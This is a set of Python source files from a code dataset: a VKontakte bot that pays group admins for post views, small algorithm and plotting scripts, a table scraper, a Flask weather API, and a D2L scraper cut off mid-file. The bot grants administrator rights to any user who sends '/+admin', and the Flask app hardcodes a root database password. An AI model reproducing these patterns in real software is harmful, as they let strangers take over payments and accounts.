self._observersByEvents.get(msgType):\n i.handleMessage(msgType=msgType, data=data)\n","repo_name":"maciejj04/Apollo","sub_path":"src/MessageServer.py","file_name":"MessageServer.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23407545441","text":"import json\nimport os\nimport requests\nfrom data 
import TOKEN, token, admin_id\nimport vk_api\nimport datetime as dt\n\napi_version = '5.52'\nvk_session = vk_api.VkApi(token=TOKEN)\nvk_session1 = vk_api.VkApi(token=token)\nvk = vk_session.get_api()\n\n\ndef get_but(text, color):\n return {\n \"action\": {\n \"type\": \"text\",\n \"payload\": \"{\\\"button\\\": \\\"\" + \"1\" + \"\\\"}\",\n \"label\": f\"{text}\"\n },\n \"color\": f\"{color}\"\n }\n\n\nmain_keyboard = {\n \"one_time\": False,\n \"buttons\": [\n [get_but('😍Получить посты', 'default'), get_but('🤑Получить оплату', 'default')],\n [get_but('📈Топ админов', 'default'), get_but('🤩Посчитать охват', 'default')]\n ]\n}\nmain_keyboard = json.dumps(main_keyboard, ensure_ascii=False).encode('utf-8')\nmain_keyboard = str(main_keyboard.decode('utf-8'))\n\npayment_keyboard = {\n \"one_time\": True,\n \"buttons\": [\n [get_but('◀Назад', 'default')]\n ]\n}\npayment_keyboard = json.dumps(payment_keyboard, ensure_ascii=False).encode('utf-8')\npayment_keyboard = str(payment_keyboard.decode('utf-8'))\n\npayment2_keyboard = {\n \"one_time\": True,\n \"buttons\": [\n [get_but('🤑Получить оплату', 'default')]\n ]\n}\npayment2_keyboard = json.dumps(payment2_keyboard, ensure_ascii=False).encode('utf-8')\npayment2_keyboard = str(payment2_keyboard.decode('utf-8'))\n\nyes_or_no_keyboard = {\n \"one_time\": True,\n \"buttons\": [\n [get_but('✅Да', 'positive'), get_but('◀Назад', 'default')]\n ]\n}\nyes_or_no_keyboard = json.dumps(yes_or_no_keyboard, ensure_ascii=False).encode('utf-8')\nyes_or_no_keyboard = str(yes_or_no_keyboard.decode('utf-8'))\n\nadmin_panel_keyboard = {\n \"one_time\": False,\n \"buttons\": [\n [get_but('💰Входящие оплаты', 'default'), get_but('😍Добавить оплаченные посты', 'default')],\n [get_but('🤩Посчитать охват', 'default'), get_but('⛔Заблокировать паблик', 'default')],\n [get_but('✏Ручная рассылка', 'default'), get_but('🔗Добавить посты для закупов', 'default')],\n [get_but('📈Топ админов', 'default'), get_but('⚒Разблокировать паблик', 'default')]\n ]\n}\n\nadmin_panel_keyboard = json.dumps(admin_panel_keyboard, ensure_ascii=False).encode('utf-8')\nadmin_panel_keyboard = str(admin_panel_keyboard.decode('utf-8'))\n\nadmin_yes_or_no_keyboard = {\n \"one_time\": True,\n \"buttons\": [\n [get_but('✅Да', 'positive'), get_but('🚫Нет', 'negative')]\n ]\n}\nadmin_yes_or_no_keyboard = json.dumps(admin_yes_or_no_keyboard, ensure_ascii=False).encode('utf-8')\nadmin_yes_or_no_keyboard = str(admin_yes_or_no_keyboard.decode('utf-8'))\n\nadmin_yes_or_no_keyboard2 = {\n \"one_time\": True,\n \"buttons\": [\n [get_but('✅Оплачено', 'positive'), get_but('⛔Заблокировать посты', 'negative')]\n ]\n}\nadmin_yes_or_no_keyboard2 = json.dumps(admin_yes_or_no_keyboard2, ensure_ascii=False).encode('utf-8')\nadmin_yes_or_no_keyboard2 = str(admin_yes_or_no_keyboard2.decode('utf-8'))\n\n\ndef sender(user_id, text, key):\n if key == 0:\n vk_session.method('messages.send', {'user_id': user_id, 'message': text, 'random_id': 0,\n 'keyboard': main_keyboard})\n if key == 1:\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': payment_keyboard})\n if key == 2:\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': yes_or_no_keyboard})\n if key == 3:\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': payment2_keyboard})\n if key == 'admin_rules':\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': 
admin_panel_keyboard})\n if key == 'admin_yes_or_no':\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': admin_yes_or_no_keyboard})\n if key == 'admin_yes':\n vk_session.method('messages.send',\n {'user_id': user_id, 'message': text, 'random_id': 0, 'keyboard': admin_yes_or_no_keyboard2})\n if key == '666':\n vk_session.method('messages.send', {'user_id': user_id, 'message': text, 'random_id': 0})\n\n\ndef main():\n global vk_session, vk_session1, vk\n try:\n while True:\n messages = vk_session.method('messages.getConversations', {'count': 200, 'filter': 'unanswered'})\n # time.sleep(1)\n if messages['count'] != 0:\n with open('dialog_state.json') as dial:\n dialogs = json.load(dial)\n user_id = str(messages['items'][0]['last_message']['from_id'])\n msg = messages['items'][0]['last_message']['text']\n if user_id not in dialogs:\n dialogs[user_id] = 'main'\n sender(user_id, 'Приветствую тебя', 0)\n with open('dialog_state.json', 'w') as file:\n json.dump(dialogs, file)\n elif user_id in admin_id or dialogs[user_id] == 'admin_rules':\n admin_dialog(user_id, msg)\n else:\n user_dialog(user_id, msg)\n except vk_api.exceptions.ApiError:\n vk_session = vk_api.VkApi(token=TOKEN)\n vk_session1 = vk_api.VkApi(token=token)\n vk = vk_session.get_api()\n main()\n except requests.exceptions.ConnectionError:\n vk_session = vk_api.VkApi(token=TOKEN)\n vk_session1 = vk_api.VkApi(token=token)\n vk = vk_session.get_api()\n main()\n\n\ndef admin_dialog(user_id, msg):\n dialogs, checker, done, req, top, descript, ban = open_json()\n if 'Посчитать охват' in msg:\n sender(user_id, '😎Укажите ссылки на посты, каждый пост с новой строчки', 1)\n dialogs[user_id] = 'checker'\n elif 'wall' in msg and dialogs[user_id] == 'checker':\n pay = get_views(msg, False, user_id)\n sender(user_id, pay[0], 1)\n elif 'Назад' in msg:\n dialogs[user_id] = 'admin_rules'\n sender(user_id, '😍🤑', 'admin_rules')\n elif 'Добавить оплаченные посты' in msg:\n dialogs[user_id] = 'pay_post'\n sender(user_id, '😎Укажите ссылки на посты, каждый пост с новой строчки', 1)\n elif dialogs[user_id] == 'pay_post' and 'wall' in msg:\n posts = msg.split('\\n')\n for elem in posts:\n done = append_doned(elem, admin_id, 'payed')\n sender(user_id, 'Успешно', 'admin_rules')\n elif '✅Да' in msg:\n send_payment()\n elif '💰Входящие оплаты' in msg:\n send_payment()\n elif '✅Оплачено' in msg:\n sender(admin_id, 'Введите номер оплаты:', '666')\n dialogs[user_id] = 'number_of_pay'\n elif dialogs[user_id] == 'number_of_pay':\n checker, done, top, text = send_grate_payment(msg)\n sender(user_id, text, '666')\n dialogs[user_id] = 'admin_rules'\n send_payment()\n elif 'Заблокировать паблик' in msg:\n sender(user_id, 'Укажите ссылку на пост или группу', 1)\n dialogs[user_id] = 'block_group'\n elif dialogs[user_id] == 'block_group':\n url = msg.split('\\n')\n for msg in url:\n if 'wall' in msg:\n group = msg.split('wall')[1].split('_')[0]\n elif 'group' in msg:\n group = '-' + msg.split('public')[1]\n else:\n info = vk_session1.method('groups.getById', {'group_id': msg.split('com/')[1]})\n group = '-' + str(info[0]['id'])\n if group not in ban['groups']:\n ban['groups'].append(group)\n sender(user_id, f'Группа {msg} забанена', 'admin_rules')\n else:\n sender(user_id, f'Группа {msg} уже в бане', 'admin_rules')\n dialogs[user_id] = 'admin_rules'\n elif 'Добавить посты для закупов' in msg:\n sender(user_id, 'Пришлите фото', 1)\n dialogs[user_id] = 'add_post_photo'\n elif dialogs[user_id] == 'add_post_photo':\n 
save_photo()\n dialogs[user_id] = 'add_post_copyright'\n elif dialogs[user_id] == 'add_post_copyright':\n name = os.listdir(path=\"data\")[-1]\n descript[name] = [msg]\n dialogs[user_id] = 'add_post_date'\n sender(user_id, 'Успешно, пришлите дату в формате ДД.ММ.ГГГГ', '666')\n elif dialogs[user_id] == 'add_post_date':\n name = os.listdir(path=\"data\")[-1]\n descript[name].append(msg)\n sender(user_id, 'Успешно', 'admin_rules')\n dialogs[user_id] = 'admin_rules'\n elif 'Ручная рассылка' in msg:\n sender(user_id, 'Введите сообщение:', 1)\n dialogs[user_id] = 'spam'\n elif dialogs[user_id] == 'spam':\n names = list(dialogs.keys())\n for name in names:\n if name != admin_id:\n sender(name, msg, 0)\n else:\n sender(name, 'Успешно', 'admin_rules')\n dialogs[user_id] = 'admin_rules'\n elif msg == '📈Топ админов':\n admins = list(top['all'].keys())\n admins.sort(key=lambda x: -int(top['all'][x][0]))\n text = f'Админы заработали с нами: {top[\"sum\"]}₽\\n'\n k = len(admins)\n if len(admins) >= 10:\n k = 11\n for i in range(k):\n text += f'\\n{i + 1}) {admins[i]} - {top[\"all\"][admins[i]][0]}₽, ' \\\n f'опубликовано {top[\"all\"][admins[i]][1]} постов'\n sender(user_id, text, 'admin_rules')\n elif 'Разблокировать паблик' in msg:\n dialogs[user_id] = 'unban'\n sender(user_id, 'Укажите ссылку на пост или группу', 1)\n elif dialogs[user_id] == 'unban':\n url = msg.split('\\n')\n for msg in url:\n if 'wall' in msg:\n group = msg.split('wall')[1].split('_')[0]\n elif 'group' in msg:\n group = '-' + msg.split('public')[1]\n else:\n info = vk_session1.method('groups.getById', {'group_id': msg.split('com/')[1]})\n group = '-' + str(info[0]['id'])\n if group in ban['groups']:\n id = ban['groups'].index(group)\n del ban['groups'][id]\n sender(user_id, f'Группа {msg} разбанена', 'admin_rules')\n else:\n sender(user_id, f'Группа {msg} не в бане', 'admin_rules')\n dialogs[user_id] = 'admin_rules'\n else:\n dialogs[user_id] = 'admin_rules'\n sender(user_id, '😍🤑', 'admin_rules')\n save_json(dialogs, checker, done, req, top, descript, ban)\n\n\ndef user_dialog(user_id, msg):\n dialogs, checker, done, req, top, descript, ban = open_json()\n if msg == '/+admin':\n dialogs[user_id] = 'admin_rules'\n sender(user_id, 'Вы получили права администратора', 'admin_rules')\n elif 'Получить оплату' in msg:\n if dialogs[user_id] == 'payment1':\n dialogs[user_id] = 'payment2'\n sender(user_id, 'Укажите номер киви в формате +79000000000', 1)\n else:\n dialogs[user_id] = 'payment1'\n sender(user_id, '😎Укажите ссылки на посты, каждый пост с новой строчки', 1)\n elif 'Получить посты' in msg:\n names = os.listdir(path=\"data\")\n if len(names) == 0:\n sender(user_id, 'Закупов на данный момент нет', 0)\n else:\n for name in names:\n if 'unactive' not in descript[name]:\n date = descript[name][1]\n copy = descript[name][0]\n print(str(dt.date.today())[-5:-2], date[-5:-2])\n if int(str(dt.date.today())[-2:]) - int(date[-2:]) >= 0 and str(dt.date.today())[-5:-2] == date[-5:-2]:\n descript[name].append('unactive')\n continue\n upload = vk_api.VkUpload(vk_session)\n photo = upload.photo_messages(f'data\\{name}', user_id)\n owner_id = photo[0]['owner_id']\n photo_id = photo[0]['id']\n access_key = photo[0]['access_key']\n attachment = f'photo{owner_id}_{photo_id}_{access_key}'\n sender(user_id, f'На {date} \\n'\n f'Исток: {copy}', 0)\n vk.messages.send(peer_id=user_id, random_id=0, attachment=attachment)\n elif 'Посчитать охват' in msg:\n sender(user_id, '😎Укажите ссылки на посты, каждый пост с новой строчки', 1)\n dialogs[user_id] = 
'checker'\n elif 'wall' in msg and dialogs[user_id] == 'checker':\n pay = get_views(msg, False, user_id)\n sender(user_id, pay[0], 1)\n elif dialogs[user_id] == 'payment1' and 'wall' in msg:\n pay = get_views(msg, True, user_id)\n req[user_id] = [pay[1], msg.split('\\n')]\n sender(user_id, pay[0], 3)\n if pay[-1]:\n sender(user_id, '\\n'.join(pay[-1]), 3)\n if pay[1] == 0:\n dialogs[user_id] = 'main'\n sender(user_id, '😍🤑', 0)\n elif '+79' in msg and dialogs[user_id] == 'payment2':\n dialogs[user_id] = 'payment3'\n sender(user_id, f'Оплачиваем {req[user_id][0]}₽ на киви {msg} \\nВсе верно?', 2)\n req[user_id].append(msg)\n elif 'Назад' in msg:\n dialogs[user_id] = 'main'\n sender(user_id, '😍🤑', 0)\n elif msg == '✅Да' and dialogs[user_id] == 'payment3':\n sender(user_id, '✅Оплата успешно запрошена! \\n‼НЕ удаляйте посты до получения оплаты!', 0)\n last = int(checker['last'])\n checker['last'] = last + 1\n checker[last] = req[user_id]\n checker[last].append(f'vk.com/id{user_id}')\n dialogs[user_id] = 'main'\n for elem in req[user_id][1]:\n done = append_doned(elem, user_id, 'requested')\n send_noutification()\n elif msg == '📈Топ админов':\n admins = list(top['all'].keys())\n admins.sort(key=lambda x: -int(top['all'][x][0]))\n text = f'Админы заработали с нами: {top[\"sum\"]}₽\\n'\n k = len(admins)\n if len(admins) >= 10:\n k = 11\n for i in range(k):\n text += f'\\n{i + 1}) https://{admins[i]} - {top[\"all\"][admins[i]][0]}₽, ' \\\n f'опубликовано {top[\"all\"][admins[i]][1]} постов'\n sender(user_id, text, 0)\n else:\n sender(user_id, '😍🤑', 0)\n dialogs[user_id] = 'main'\n save_json(dialogs, checker, done, req, top, descript, ban)\n\n\ndef send_noutification():\n post = 1\n dialogs, checker, done, req, top, descript, ban = open_json()\n last = checker['last']\n for i in range(last + 1, 100000000, -1):\n if str(i) in checker:\n post += 1\n sender(admin_id, f'{post} постов ожидают оплаты. \\nПросмотреть?', 'admin_yes_or_no')\n\n\ndef send_payment():\n dialogs, checker, done, req, top, descript, ban = open_json()\n payment_id = checker['last'] - 1\n while str(payment_id) not in checker:\n payment_id -= 1\n if payment_id < 100000000:\n sender(admin_id, 'Входящих оплат нет', 'admin_rules')\n return True\n sender(admin_id, 'ОПЛАТА 💰', '666')\n sender(admin_id, f'{str(payment_id)}', '666')\n sender(admin_id, f'🧛‍♂админ: {checker[str(payment_id)][3]}\\n' +\n '😍 посты:' + str('\\n'.join(checker[str(payment_id)][1])) +\n f'\\n💵сумма: {checker[str(payment_id)][0]}\\n'\n f'Qiwi: {checker[str(payment_id)][2]}', 'admin_yes')\n\n\ndef send_grate_payment(payment_id):\n dialogs, checker, done, req, top, descript, ban = open_json()\n if payment_id in checker:\n sender(checker[payment_id][3][9:],\n f'✅Вы получили оплату за посты. 
'\n f'\\nНомер киви: {checker[payment_id][2]} '\n f'\\nСумма: {checker[payment_id][0]}₽'\n f'\\nСтатус: Оплачено✅ '\n f'\\nОставьте отзыв, чтобы другие админы не просили предоплату: '\n f'\\nhttps://vk.com/topic-203281870_47417826',\n 0)\n top['sum'] += checker[payment_id][0]\n if checker[payment_id][3] not in top['all']:\n top['all'][checker[payment_id][3]] = [0, 0]\n top['all'][checker[payment_id][3]][0] += checker[payment_id][0]\n for url in checker[payment_id][1]:\n user_id = url.split('wall')[1]\n group_id = user_id.split('_')[0]\n post_id = user_id.split('_')[1]\n top['all'][checker[payment_id][3]][1] += 1\n done[group_id][post_id][1] = 'payed'\n del checker[payment_id]\n text = 'Успешно оплачено'\n else:\n text = 'Входящих оплат нет'\n return checker, done, top, text\n\n\ndef block_payment(payment_id):\n dialogs, checker, done, req, top, descript, ban = open_json()\n sender(checker[payment_id][3][7:], f'😳Ваша оплата №{payment_id} была отклонена. '\n f'За подробностями к vk.com/id{admin_id}', 0)\n for url in checker[payment_id][1]:\n user_id = url.split('wall')[1]\n group_id = user_id.split('_')[0]\n post_id = user_id.split('_')[1]\n done[group_id][post_id][1] = 'banned'\n del checker[payment_id]\n return done, checker\n\n\ndef open_json():\n with open('dialog_state.json') as dial:\n dialogs = json.load(dial)\n with open('checker.json') as dial:\n checker = json.load(dial)\n with open('doned.json') as dial:\n done = json.load(dial)\n with open('requests.json') as dial:\n req = json.load(dial)\n with open('top_of_all.json') as dial:\n top = json.load(dial)\n with open('post_description.json') as dial:\n descript = json.load(dial)\n with open('banned.json') as dial:\n ban = json.load(dial)\n return dialogs, checker, done, req, top, descript, ban\n\n\ndef save_json(dialogs, checker, done, req, top, descript, ban):\n with open('dialog_state.json', 'w') as file:\n json.dump(dialogs, file)\n with open('checker.json', 'w') as file:\n json.dump(checker, file)\n with open('doned.json', 'w') as file:\n json.dump(done, file)\n with open('requests.json', 'w') as file:\n json.dump(req, file)\n with open('top_of_all.json', 'w') as file:\n json.dump(top, file)\n with open('post_description.json', 'w') as file:\n json.dump(descript, file)\n with open('banned.json', 'w') as file:\n json.dump(ban, file)\n\n\ndef check_copypaste(copy):\n dialogs, checker, done, req, top, descript, ban = open_json()\n names = os.listdir(path=\"data\")\n for name in names:\n if copy == descript[name][0]:\n return True\n return False\n\n\ndef check_contacts(group_id, user_id):\n info = vk_session1.method('groups.getById', {'group_id': group_id[1:], 'fields': 'contacts'})\n state = False\n for i in range(len(info[0]['contacts'])):\n if int(info[0]['contacts'][i]['user_id']) == int(user_id):\n state = True\n break\n return state\n\n\ndef check_doned(user_id):\n dialogs, checker, done, req, top, descript, ban = open_json()\n group_id = user_id.split('_')[0]\n post_id = user_id.split('_')[1]\n if group_id in done:\n if post_id in done[group_id]:\n return done[group_id][post_id][1]\n return False\n\n\ndef append_doned(url, user_id, text):\n dialogs, checker, done, req, top, descript, ban = open_json()\n try:\n group_id = url.split('wall')[1].split('_')[0]\n post_id = url.split('wall')[1].split('_')[1]\n info = vk_session1.method('wall.getById', {'posts': f\"{group_id}_{post_id}\"})\n unix = info[0]['date']\n date = unix // 86400\n if group_id not in done:\n done[group_id] = {}\n done[group_id][post_id] = [date, text]\n return 
done\n except:\n if user_id == admin_id:\n sender(user_id, 'Ошибка', 'admin_rules')\n else:\n sender(user_id, 'Ошибка', 0)\n return done\n\n\ndef data_check(post_id):\n dialogs, checker, done, req, top, descript, ban = open_json()\n group_id = post_id.split('_')[0]\n post_id = post_id.split('_')[1]\n info = vk_session1.method('wall.getById', {'posts': f\"{group_id}_{post_id}\"})\n unix = info[0]['date']\n date = unix // 86400\n today = dt.datetime.timestamp(dt.datetime.today()) // 86400\n if today - date >= 5:\n return 'long'\n else:\n files = os.listdir(path=\"data\")\n count_files_data = len(files)\n for i in range(count_files_data):\n name = f'img{i}.jpg'\n if name in descript:\n if descript[name][1] == date:\n return True\n return 'uncorrect'\n\n\ndef banned_public(group_id):\n dialogs, checker, done, req, top, descript, ban = open_json()\n if group_id in ban['groups']:\n return False\n return True\n\n\ndef get_views(urls, state, user_id):\n urls = urls.split('\\n')\n counted_urls = []\n deffect_postes = []\n summa_of_views = 0\n for url in urls:\n if 'wall' in url:\n info = vk_session1.method('wall.getById', {'posts': url.split('wall')[1]})\n view = info[0]['views']['count']\n doned = check_doned(url.split('wall')[1])\n try:\n copy = check_copypaste(info[0]['copyright']['link'])\n except KeyError:\n copy = False\n try:\n contact = check_contacts(url.split('wall')[1].split('_')[0], user_id)\n except KeyError:\n contact = False\n if url not in counted_urls:\n if state:\n if banned_public(url.split('wall')[1].split('_')[1]):\n if copy:\n if data_check(url):\n if contact:\n if not doned:\n summa_of_views += view\n elif doned == 'requested':\n deffect_postes.append(f'{url} - Оплата уже запрошена')\n elif doned == 'banned':\n deffect_postes.append(f'{url} - Оплата за этот пост была отклонена')\n elif doned == 'payed':\n deffect_postes.append(f'{url} - Пост оплачен')\n else:\n deffect_postes.append(f'{url} - Вас нет в контактах')\n elif data_check(url) == 'long':\n deffect_postes.append(f'{url} - Пост был выставлен более 5-ти дней назад')\n else:\n deffect_postes.append(f'{url} - Некорректная дата')\n else:\n deffect_postes.append(f'{url} - Несовпадение источника')\n else:\n deffect_postes.append(f'{url} - Выплаты из этого паблика заблокированы')\n else:\n summa_of_views += view\n counted_urls.append(url)\n final = f'🤩Общий охват: {summa_of_views} \\n Сумма: {summa_of_views * 15 // 1000}₽'\n return [final, summa_of_views * 15 // 1000, deffect_postes]\n\n\ndef save_photo():\n info = vk_session.method('messages.getHistoryAttachments', {'peer_id': admin_id, 'media_type': 'photo', 'count': 1})\n url = info['items'][0]['attachment']['photo']['sizes'][-1]['url']\n files = os.listdir(path=\"data\")\n count_files_data = len(files)\n picture = requests.get(url)\n while f'img{count_files_data}.jpg' in files:\n count_files_data += 1\n with open(f'data\\img{count_files_data}.jpg', 'wb') as file:\n file.write(picture.content)\n sender(admin_id, 'Успешно, пришлите источник', '666')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Ross-pixel/vk_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":25428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37599587251","text":"import os\nimport numpy as np\n\n\ndef compare_numbers(num1, num2) :\n combo1 = num1 + num2\n combo2 = num2 + num1\n \n if combo1 >= combo2 :\n return num1\n else :\n return num2\n\ndef largest_number(numbers) :\n largest_numb = []\n \n 
while len(numbers) > 0 :\n largest_val = numbers[0]\n for vals in numbers :\n largest_val = compare_numbers(largest_val, vals)\n largest_numb.append(largest_val)\n numbers.remove(largest_val)\n \n return int(\"\".join(largest_numb))\n\n\nif __name__ == \"__main__\" :\n n = int(input())\n numbers = input().split()\n print(largest_number(numbers))","repo_name":"agabhi017/Algortihmic-Toolbox","sub_path":"Week 3/q7_max_salary_v2.py","file_name":"q7_max_salary_v2.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72026053044","text":"from neuron import h\nimport matplotlib\nmatplotlib.use('Agg')\nimport numpy\nfrom pylab import *\nimport mytools\nimport pickle\nimport time\nimport sys\nimport random\n\nv0 = -80\nca0 = 0.0001\nBACdt = 5.0\nfs = 8\ntstop = 13000.0\nicell = 0\n\nh(\"\"\" load_file(\"myrun.hoc\") \"\"\")\n\nclose(\"all\")\nf,axarr = subplots(1,1)\nplotteds = []\nfor itree in range(0,3):\n if itree == 0:\n nsec = len(h.dend)\n elif itree == 1:\n nsec = len(h.apic)\n else:\n nsec = 1\n\n for j in range(nsec-1,-1,-1):\n if itree == 0:\n h(\"access dend[\"+str(j)+\"]\")\n elif itree == 1:\n h(\"access apic[\"+str(j)+\"]\")\n else:\n h(\"access a_soma\")\n h(\"tmpvarx = x3d(0)\")\n h(\"tmpvary = y3d(0)\")\n h(\"tmpvarz = z3d(0)\")\n h(\"tmpvarx2 = x3d(n3d()-1)\")\n h(\"tmpvary2 = y3d(n3d()-1)\")\n h(\"tmpvarz2 = z3d(n3d()-1)\")\n coord1 = [h.tmpvarx,h.tmpvary,h.tmpvarz]\n coord2 = [h.tmpvarx2,h.tmpvary2,h.tmpvarz2]\n col = \"#000000\"\n if itree == 0:\n col = \"#000000\"\n elif 0.5*(coord1[1]+coord2[1]) < 650:\n col = \"#000000\"\n if itree == 2:\n col = \"#000000\"\n\n h(\"\"\"\nmyn = n3d()\nmyx0 = x3d(0)\nmyy0 = y3d(0)\nmyz0 = z3d(0)\n\"\"\")\n oldcoord = [h.myx0, h.myy0, h.myz0]\n for k in range(1,int(h.myn)):\n h(\"\"\"\nmyx0 = x3d(\"\"\"+str(k)+\"\"\")\nmyy0 = y3d(\"\"\"+str(k)+\"\"\")\nmyz0 = z3d(\"\"\"+str(k)+\"\"\")\nmydiam = diam\"\"\")\n\n axarr.plot([oldcoord[0],h.myx0],[oldcoord[1],h.myy0],'k-',linewidth=h.mydiam*0.25,color=col)\n plotteds.append([[oldcoord[0],h.myx0],[oldcoord[1],h.myy0],'k-',h.mydiam*0.25,col])\n oldcoord = [h.myx0, h.myy0, h.myz0]\naxis(\"equal\")\nf.savefig(\"morph_unicolor.eps\")\n\nfile = open('morph.sav', 'wb')\npickle.dump(plotteds,file)\nfile.close()\n\n \n\n","repo_name":"ModelDBRepository/267293","sub_path":"modulhcn_almog/drawmorph_unicolor.py","file_name":"drawmorph_unicolor.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29047297223","text":"import random\n\n\ndef check_inputs(func):\n def wrapper(*args, **kw):\n self = args[0]\n inputs = args[1]\n input_names = self.input_names\n for name in input_names:\n assert name in inputs.keys()\n return func(*args, **kw)\n\n return wrapper\n\n\ndef generate_samples(input_names, min_val=0, max_val=1, sample_limit=1000):\n samples = []\n for i in range(sample_limit):\n inputs = {}\n for name in input_names:\n inputs[name] = random.randint(min_val, max_val)\n samples.append(inputs)\n return samples\n","repo_name":"ml-inory/ic_design","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38126251523","text":"import lxml\nfrom bs4 import BeautifulSoup as bs\nfrom create_json import CreateJson\n\n# Класс по парсингу таблиц из сайта\n\nclass Table:\n def 
__init__(self,source):\n self.soup = bs(source,'lxml')\n self.soup_body = None\n self.list_table = None\n self.inform = False\n self.not_table = None\n self.create_json = CreateJson()\n\n#Проверка наличии таблицы\n\n def check_body_table(self):\n self.list_table = self.soup_body.select(\"table.genTbl\")\n self.not_table = self.soup_body.find('div',{'class':'fullHeaderTwoColumnPage--top'})\n if self.not_table:\n self.inform = True\n else:\n self.inform = False\n \n \n# Поиск елементов в разных блоках\n\n def find_table(self):\n if self.soup.main:\n self.soup_body = self.soup.main\n self.check_body_table()\n elif self.soup.section:\n self.soup_body = self.soup.section\n self.check_body_table()\n \n#Функция поиска если не таблица\n\n def find_not_table(self):\n list_title = self.soup_body.find('h1').text.replace(\"\\t\", \"\")\n information = self.soup_body.find('div',{'class':'fullHeaderTwoColumnPage--top'}).select_one('div.top.bold.inlineblock').select('span')\n table = {list_title: [information[1].text, information[2].text, information[4].text]}\n self.create_json.create(table, self.inform)\n return self.create_json.get_table()\n\n\n#Функция вывода если таблица\n\n def output_info_table(self,list_title):\n table = {}\n if len(list_title) == len(self.list_table):\n for i in range(len(list_title)):\n title = list_title[i].text\n if title not in table.keys():\n table[title] = {}\n list_tag_td = self.list_table[i].find_all('td')\n tbl = [tag_td.text.strip() for tag_td in list_tag_td]\n for j in range(len(tbl)):\n if j % 10 == 1:\n table[title][tbl[j]] = tbl[j + 1:j + 8]\n\n self.create_json.create(table, self.inform)\n return self.create_json.get_table()\n#Вывод информации с сайта\n\n def info_tables(self):\n self.find_table()\n if self.inform:\n return self.find_not_table()\n else:\n if len(self.list_table) > 1:\n list_title = self.soup_body.find_all('h2')\n return self.output_info_table(list_title)\n elif len(self.list_table) == 1:\n list_title = self.soup_body.find_all('h1')\n return self.output_info_table(list_title)\n\n\n\n","repo_name":"Multivarka/scraping_invest","sub_path":"infotable.py","file_name":"infotable.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71113164405","text":"import mysql.connector\r\nfrom mysql.connector import errorcode\r\nimport flask\r\nfrom flask import request, jsonify\r\nimport requests\r\nimport json\r\n\r\n#initiating flask\r\napp = flask.Flask(__name__)\r\napp.config[\"DEBUG\"] = True\r\n\r\n# Database connection\r\ntry:\r\n cnx = mysql.connector.connect(host=\"localhost\", user='root', password='12345')\r\nexcept mysql.connector.Error as err:\r\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\r\n print(\"Wrong password\")\r\n else:\r\n print(err)\r\n \r\ncursor = cnx.cursor()\r\nquery = (\" SELECT LOCATION, DATE, temperature, FORECAST FROM DEDOMENA.KAIROS\")\r\ncursor.execute(query)\r\n\r\nfirst_list = [] #first list contains three forecasts per day\r\nfor (location, date, temperature, forecast) in cursor:\r\n first_list.extend(list((location, date, temperature, forecast)))\r\n \r\nsecond_list = [] #second list contains latest forecast per day\r\nfor i in range(0, len(first_list), 12):\r\n second_list.append(first_list[i])\r\n second_list.append(first_list[i+1])\r\n second_list.append(first_list[i+2])\r\n second_list.append(first_list[i+3])\r\n\r\nthird_list = [] #third list contains average temperature per day\r\nfor i in range(0, 
len(first_list), 12):\r\n third_list.append(first_list[i])\r\n third_list.append(first_list[i+1])\r\n third_list.append((first_list[i+2] + first_list[i+6] + first_list[i+10])/ 3)\r\n third_list.append(first_list[i+3])\r\n \r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n return jsonify(second_list) \r\n \r\n@app.route('/average_temp', methods=['GET'])\r\ndef forecasts():\r\n return jsonify(third_list) \r\n \r\napp.run()","repo_name":"Ammutseba/metaweather","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21733340407","text":"from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport numpy as np\r\nimport datetime\r\nimport pickle\r\n\r\n# handles the hidden roots on d2l pages\r\ndef expand_shadow_element(element):\r\n shadow_root = driver.execute_script('return arguments[0].shadowRoot', element)\r\n return shadow_root\r\n\r\n# loads pickled files\r\ndef load_obj(datatype):\r\n with open(\"{}\".format(datatype) + '.pkl', 'rb') as f:\r\n return pickle.load(f)\r\n\r\n# container for msuclass objects, also initializes new msuclass objs with values along with other methods\r\nclass msuclasses:\r\n def __init__(self):\r\n # init various needed variables\r\n self.classes = []\r\n self.assn_id_holder = \"873465\"\r\n self.get_assignments()#self.d2l_driver())\r\n \r\n # add a new msuclass object\r\n def add_new(self,id):\r\n # if not multiple ids then make list\r\n if type(id) != list:id = [id]\r\n # starts d2l selenium driver\r\n driver = self.d2l_driver()\r\n # add individual class data to self.classes\r\n [self.classes.append(msuclass(i,driver)) for i in id]\r\n\r\n # gets individual class pending assignments [webscraper]\r\n def get_assignments(self):#,driver):\r\n # scrapes the d2l assn webpage and initialize needed variables\r\n # driver.get(\"https://d2l.msu.edu/d2l/le/calendar/{}/home/list?year=2010&month=6&day=27\".format(self.assn_id_holder))\r\n # assnsoup = BeautifulSoup(driver.page_source,\"html.parser\")\r\n assnsoup = 